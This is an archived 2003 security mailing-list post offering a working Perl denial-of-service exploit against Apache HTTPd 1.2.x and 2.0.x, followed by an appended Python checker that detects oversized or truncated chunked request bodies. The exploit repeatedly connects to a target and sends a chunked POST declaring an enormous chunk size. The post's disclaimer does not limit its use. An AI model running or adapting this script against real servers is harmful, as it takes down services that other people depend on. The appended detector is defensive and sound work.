Archive: November 2003 ml@sikurezza.org
Subject: Apache HTTPd Denial of Service in POST parameter
From: BlackAngels
Date: 24 Nov 2003 22:38:56 -0000
[ APACHE HTTPD DENIAL OF SERVICE IN POST PARAMETER ]

{ Vulnerable systems }

Apache webserver 1.2.x ( x < 26 )
Apache webserver 2.0.x


{ Exploit's code }


#!/usr/bin/perl -w

# Apache HTTPd Denial of Service exploit in POST parameter
#
# Legal notes :
# The BlackAngels staff refuse all responsibility for an incorrect
# or illegal use of the information supplied with this paper or for
# eventual damages to others' systems.
#
# For more information :
# [ http://www.blangels.it ] - ( staff@xxxxxxxxxxx )

use IO::Socket;

if(@ARGV == 2){
my $target = $ARGV[0];
my $port = $ARGV[1];
my $count;

print "\nApache webserver Denial of Service exploit in POST parameter";
print "\nVulnerable versions: 1.2.26 or previous and 2.0.x";
print "\n============================================================\n";

while(){
$sock = IO::Socket::INET->new(PeerAddr => $target,
PeerPort => "$port",
Proto => 'tcp');

unless($sock){
die "Couldn't connect ...";
}
$sock->autoflush(1);
print $sock "POST /foo.htm HTTP/1.1\nHost: $target\nTransfer-Encoding:
chunked\n\n90000000\n\n";

while ( <$sock> ){
print;
}
close $sock;
$count++;
print "Status: $count requests sent ...\n";
}
}else{
print "\nUsage: ./$0 [target] [port]\n";
}


________________________________________________________
http://www.sikurezza.org - Italian Security Mailing List
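
Added example, not part of the original post: a defender-side check that parses the chunked framing of a captured request and flags one shaped like the request the script sends, where the chunk-size line declares far more data than a policy limit allows or than the request actually carries. The function names, the 1 MiB limit and the sample requests are assumptions constructed for illustration.

```python
import re

MAX_CHUNK = 1 << 20  # assumed policy limit (1 MiB) per chunk; tune per site

def is_chunked(head: bytes) -> bool:
    """True if a Transfer-Encoding header lists the 'chunked' coding."""
    for line in re.split(rb"\r?\n", head)[1:]:
        name, _, value = line.partition(b":")
        if name.strip().lower() == b"transfer-encoding":
            if b"chunked" in [c.strip().lower() for c in value.split(b",")]:
                return True
    return False

def check_request(raw: bytes, max_chunk: int = MAX_CHUNK) -> str:
    """Return not-chunked, ok, malformed, oversized-chunk or truncated-chunk."""
    m = re.search(rb"\r?\n\r?\n", raw)           # end of headers, bare LF tolerated
    head, body = (raw[:m.start()], raw[m.end():]) if m else (raw, b"")
    if not is_chunked(head):
        return "not-chunked"
    pos = 0
    while True:
        nl = body.find(b"\n", pos)
        if nl == -1:
            return "truncated-chunk"             # no complete chunk-size line
        size_field = body[pos:nl].split(b";", 1)[0].strip()  # drop chunk extensions
        if not re.fullmatch(rb"[0-9A-Fa-f]{1,16}", size_field):
            return "malformed"
        size = int(size_field, 16)
        if size == 0:
            return "ok"                          # last-chunk reached
        if size > max_chunk:
            return "oversized-chunk"             # declared size exceeds policy
        end = nl + 1 + size
        if len(body) <= end:
            return "truncated-chunk"             # fewer bytes present than declared
        term = re.match(rb"\r?\n", body[end:])   # line ending after chunk data
        if not term:
            return "malformed"
        pos = end + term.end()

# Constructed sample requests (not captured traffic).
SCRIPT_SHAPED = (b"POST /foo.htm HTTP/1.1\nHost: target.example\n"
                 b"Transfer-Encoding: chunked\n\n90000000\n\n")
WELL_FORMED = (b"POST /upload HTTP/1.1\r\nHost: target.example\r\n"
               b"Transfer-Encoding: chunked\r\n\r\n5\r\nhello\r\n0\r\n\r\n")
SHORT_BODY = (b"POST /upload HTTP/1.1\r\nHost: target.example\r\n"
              b"Transfer-Encoding: chunked\r\n\r\n400\r\nhello")

if __name__ == "__main__":
    for name, req in [("script-shaped", SCRIPT_SHAPED),
                      ("well-formed", WELL_FORMED), ("short-body", SHORT_BODY)]:
        print(f"{name}: {check_request(req)}")
```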



